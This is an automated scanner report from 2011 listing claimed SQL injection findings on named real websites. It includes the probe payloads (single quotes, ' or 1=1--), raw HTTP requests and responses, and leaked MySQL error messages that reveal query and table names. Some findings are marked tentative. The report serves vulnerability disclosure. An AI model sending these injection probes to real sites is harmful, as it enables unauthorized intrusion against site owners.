SQL Injection, CWE-89, CAPEC-66, Single Quote, Database Error, DORK Report

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Apr 02 06:09:43 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. SQL injection

1.1. http://www.almanac.com/server-status [REST URL parameter 1]

1.2. http://www.beeg.com/favicon.ico [REST URL parameter 1]

1.3. http://www.beeg.com/server-status [REST URL parameter 1]

1.4. http://www.beeg.com/server-status [name of an arbitrarily supplied request parameter]

1.5. http://www.comannet.com/server-status [REST URL parameter 1]

1.6. http://www.comannet.com/server-status [name of an arbitrarily supplied request parameter]

1.7. http://www.essortment.com/server-status [REST URL parameter 1]

1.8. http://www.excite.com/server-status [REST URL parameter 1]

1.9. http://www.helium.com/server-status [name of an arbitrarily supplied request parameter]

1.10. http://www.lyricsdepot.com/server-status [REST URL parameter 1]

1.11. http://www.newsweek.com/server-status [name of an arbitrarily supplied request parameter]

1.12. http://www.qwickstep.com/server-status [REST URL parameter 1]

1.13. http://www.smartertravel.com/server-status [REST URL parameter 1]

1.14. http://www.tech-recipes.com/server-info [REST URL parameter 1]

1.15. http://www.tech-recipes.com/server-status [REST URL parameter 1]

1.16. http://www.travelscream.com/server-status [REST URL parameter 1]

1.17. http://www.usf.edu/server-info [REST URL parameter 1]

1.18. http://www.usf.edu/server-info [name of an arbitrarily supplied request parameter]

1.19. http://www.usf.edu/server-status [REST URL parameter 1]

1.20. http://www.usf.edu/server-status [name of an arbitrarily supplied request parameter]

1.21. http://www.x17online.com/server-status [REST URL parameter 1]



1. SQL injection
There are 21 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.almanac.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.almanac.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15683602'%20or%201%3d1--%20 and 15683602'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status15683602'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.almanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:02:04 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:02:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: SESS095d323cd8058abaa3a07a4ec41b18d5=aqdrue1g1femjn1184avvm59u0; expires=Mon, 25 Apr 2011 05:35:24 GMT; path=/; domain=.almanac.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<me
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-9c5995c6232e15094ed8efbadb093bcd" value="form-9c5995c6232e15094ed8efbadb093bcd" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
<input type="hidden" name="default_text" id="edit-default-text" value="Keywords..." class="default-text" />
</div>

</div></form>
</div>
        <div id="my-account">
<a href="/user" title="My Account" class="button">My Account</a><a href="/user/register?destination=server-status15683602%27+or+1%3D1--+" title="New? Register">New? Register</a> | <a href="/user/login?destination=server-status15683602%27+or+1%3D1--+" title="Log In">Log In</a> </div>
</div><a href="http://twitter.com/almanac" target="_blank"><img class="twitter" src="/sites/new.almanac.com/themes/almanac960/images/t_small-a.png" alt="Follow the Almanac on Twitter" /></a>
       <a href="http://www.facebook.com/theoldfarmersalmanac" target="_blank"><img class="facebook" src="/sites/new.almanac.com/themes/almanac960/images/facebook-connect.png" alt="Become a Facebook Fan of the Almanac" /></a>
<a href="/content/rss"><img class="rss" src="/sites/new.almanac.com/themes/almanac960/images/rss-icon.png" alt="The Old Farmer's Almanac RSS Feed" /></a>
<a href="/store" class="shop">Shop</a> <a href="/store"><img class="cart" src="/sites/new.almanac.com/themes/almanac960/images/shopping-cart.png" alt="The Old Farmer's Almanac.com General Store" /></a>
<a onClick="_gaq.push(['_trackEvent', 'Web promo ad', 'Click Free 2 month LRW', 'LRWF']);" href="/weather/longrange">
<img class="lrweather" src="/sites/new.almanac.com/themes/almanac960/images/free-lrweather.png" alt="Free 2-Month Long-Range Weather" /></a>

<div id="site-header" class="clear-block">
<div id="branding" class="grid-4 imgfilter">

<div id="fb-like">
        <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.facebook.com/theoldfarmersalm
...[SNIP]...

Request 2

GET /server-status15683602'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.almanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:02:05 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:02:05 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: SESS095d323cd8058abaa3a07a4ec41b18d5=thrjklvktfllcbbrnrtksti2o0; expires=Mon, 25 Apr 2011 05:35:25 GMT; path=/; domain=.almanac.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 32343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<me
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-c33428d33a05097a7fac9f7ca4d293bd" value="form-c33428d33a05097a7fac9f7ca4d293bd" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
<input type="hidden" name="default_text" id="edit-default-text" value="Keywords..." class="default-text" />
</div>

</div></form>
</div>
        <div id="my-account">
<a href="/user" title="My Account" class="button">My Account</a><a href="/user/register?destination=server-status15683602%27+or+1%3D2--+" title="New? Register">New? Register</a> | <a href="/user/login?destination=server-status15683602%27+or+1%3D2--+" title="Log In">Log In</a> </div>
</div><a href="http://twitter.com/almanac" target="_blank"><img class="twitter" src="/sites/new.almanac.com/themes/almanac960/images/t_small-a.png" alt="Follow the Almanac on Twitter" /></a>
       <a href="http://www.facebook.com/theoldfarmersalmanac" target="_blank"><img class="facebook" src="/sites/new.almanac.com/themes/almanac960/images/facebook-connect.png" alt="Become a Facebook Fan of the Almanac" /></a>
<a href="/content/rss"><img class="rss" src="/sites/new.almanac.com/themes/almanac960/images/rss-icon.png" alt="The Old Farmer's Almanac RSS Feed" /></a>
<a href="/store" class="shop">Shop</a> <a href="/store"><img class="cart" src="/sites/new.almanac.com/themes/almanac960/images/shopping-cart.png" alt="The Old Farmer's Almanac.com General Store" /></a>
<a onClick="_gaq.push(['_trackEvent', 'Web promo ad', 'Click Free 2 month LRW', 'LRWF']);" href="/weather/longrange">
<img class="lrweather" src="/sites/new.almanac.com/themes/almanac960/images/free-lrweather.png" alt="Free 2-Month Long-Range Weather" /></a>

<div id="site-header" class="clear-block">
<div id="branding" class="grid-4 imgfilter">

<div id="fb-like">
        <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.facebook.com/theoldfarmersalm
...[SNIP]...

1.2. http://www.beeg.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beeg.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.beeg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:13:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 303

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'favicon.ico'' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'' AND `Name` = ''' at line 1]

1.3. http://www.beeg.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beeg.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 307

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'server-status'' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''server-status'' AND `Name` = ''' at line 1]

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 1832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.4. http://www.beeg.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beeg.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /server-status?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 296

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'server-status?1'=1' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND `Name` = ''' at line 1]

Request 2

GET /server-status?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 1832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.5. http://www.comannet.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.comannet.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21186257'%20or%201%3d1--%20 and 21186257'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status21186257'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:40:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 353
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status21186257' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Request 2

GET /server-status21186257'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:40:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 349
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /server-status21186257' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

1.6. http://www.comannet.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.comannet.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 93324201%20or%201%3d1--%20 and 93324201%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?193324201%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:40:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Request 2

GET /server-status?193324201%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:40:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 330
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /server-status was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

1.7. http://www.essortment.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.essortment.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 03:00:05 GMT
Connection: close

You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 03:00:05 GMT
Content-Length: 14756
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.8. http://www.excite.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.excite.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 86407274'%20or%201%3d1--%20 and 86407274'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status86407274'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.excite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:35:30 GMT
Server: Apache/1.3.20 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: private
Expires: Sat 02 Apr 1977 17:15:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 89486


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   
    <script>
   pageId=Math.round(Math.random() * 10000000000);
   randomNum = Math.round(Math.random() * 100
...[SNIP]...
<script type="text/javascript">
var moPstat=0 ;
var SP500_LAST = '1,252.31';
var SP500_NET_CHANGE = '<font color=black>0.00</font>';

var MKT_TIME = '12:30 pm ET, Real-Time';

</script>

<font class=modspace><br></font>
<!-- EDHEDH END INCLUDE COMPONENT: MO -->
<!-- EDHEDH START INCLUDE COMPONENT: SP -->

<script type="text/javascript">
var SPstatus = 1 ;
</script>
<script type="text/javascript">
var spPstat=0 ;
nfl_scores = new Array();
nfl_scores[0] = "10-SEP-09|1|Thursday|Sep. 10, 2009|Pittsburgh|Tennessee|20090910023|Pit|Ten|Pre-game|20|30||||||||20090910|12";
nfl_scores[1] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Atlanta|Miami|20090913001|Atl|Mia|Pre-game|13|0||||||||20090913|15";
nfl_scores[2] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Baltimore|Kansas City|20090913033|Bal|KC|Pre-game|13|0||||||||20090913|15";
nfl_scores[3] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Carolina|Philadelphia|20090913029|Car|Phi|Pre-game|13|0||||||||20090913|15";
nfl_scores[4] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cincinnati|Denver|20090913004|Cin|Den|Pre-game|13|0||||||||20090913|15";
nfl_scores[5] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cleveland|Minnesota|20090913005|Cle|Min|Pre-game|13|0||||||||20090913|15";
nfl_scores[6] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Houston|New York|20090913034|Hou|NYJ|Pre-game|13|0||||||||20090913|15";
nfl_scores[7] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Indianapolis|Jacksonville|20090913011|Ind|Jac|Pre-game|13|0||||||||20090913|15";
nfl_scores[8] = "13-SEP-09|1|Sunday|Sep. 13, 2009|New Orleans|Detroit|20090913018|NO|Det|Pre-game|13|0||||||||20090913|15";
nfl_scores[9] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Tampa Bay|Dallas|20090913027|TB|Dal|Pre-game|13|0||||||||20090913|15";
nfl_scores[10] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Arizona|San Francisco|20090913022|Ari|SF|Pre-game|16|15||||||||20090913|15";
nfl_scores[11] = "13-SEP-09|1|Sunday|Sep. 13, 2009|New York|Washington|20090913019|NYG|Was|Pre-game|16|15||||||||20090913|15";
nfl_scores[12] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Seattle|St. Louis|20090913026|Sea|
...[SNIP]...

Request 2

GET /server-status86407274'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.excite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:35:31 GMT
Server: Apache/1.3.20 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: private
Expires: Sat 02 Apr 1977 17:15:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 90131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   
    <script>
   pageId=Math.round(Math.random() * 10000000000);
   randomNum = Math.round(Math.random() * 100
...[SNIP]...
<script type="text/javascript">
var moPstat=0 ;
var DOW_SYMBOL = '<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^INDU&alias=/alias/money/cm/qt"><font color=#0033cc>DOW</font></a>';
var DOW_LAST = '11,231.96';
var DOW_NET_CHANGE = '<font color=black>0.00</font>';
var NASDAQ_SYMBOL ='<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^COMPX&alias=/alias/money/cm/qt"><font color=#0033cc>NASDAQ</font></a>';
var NASDAQ_LAST = '2,243.32';
var NASDAQ_NET_CHANGE = '<font color=black>0.00</font>';
var SP500_SYMBOL = '<a href="http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=^INX&alias=/alias/money/cm/qt"><font color=#0033cc>S&P 500</font></a>';
var SP500_LAST = '1,252.31';
var SP500_NET_CHANGE = '<font color=black>0.00</font>';

var MKT_TIME = '12:30 pm ET, Real-Time';

</script>

<font class=modspace><br></font>
<!-- EDHEDH END INCLUDE COMPONENT: MO -->
<!-- EDHEDH START INCLUDE COMPONENT: SP -->

<script type="text/javascript">
var SPstatus = 1 ;
</script>
<script type="text/javascript">
var spPstat=0 ;
nfl_scores = new Array();
nfl_scores[0] = "10-SEP-09|1|Thursday|Sep. 10, 2009|Pittsburgh|Tennessee|20090910023|Pit|Ten|Pre-game|20|30||||||||20090910|12";
nfl_scores[1] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Atlanta|Miami|20090913001|Atl|Mia|Pre-game|13|0||||||||20090913|15";
nfl_scores[2] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Baltimore|Kansas City|20090913033|Bal|KC|Pre-game|13|0||||||||20090913|15";
nfl_scores[3] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Carolina|Philadelphia|20090913029|Car|Phi|Pre-game|13|0||||||||20090913|15";
nfl_scores[4] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cincinnati|Denver|20090913004|Cin|Den|Pre-game|13|0||||||||20090913|15";
nfl_scores[5] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Cleveland|Minnesota|20090913005|Cle|Min|Pre-game|13|0||||||||20090913|15";
nfl_scores[6] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Houston|New York|20090913034|Hou|NYJ|Pre-game|13|0||||||||20090913|15";
nfl_scores[7] = "13-SEP-09|1|Sunday|Sep. 13, 2009|Indianapolis|Jacksonvi
...[SNIP]...

1.9. http://www.helium.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.helium.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19769932'%20or%201%3d1--%20 and 19769932'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?119769932'%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helium.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Mongrel 1.1.3
Status: 404
Cache-Control: no-cache, max-age=3600
Content-Type: text/html; charset=utf-8
Content-Length: 14619
Set-Cookie: _helium_session=5edca78971d521c418cef18701baf2ba; path=/
Expires: Sat, 02 Apr 2011 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page Built: Sat Apr 02 02:56:07 +0000 2011 -->
<html xmlns="http:
...[SNIP]...
<script>var tagOptions415 = new Object();
tagOptions415.rel = 'Stylesheet';
tagOptions415.type = 'text/css';
tagOptions415.media = 'screen, projection';
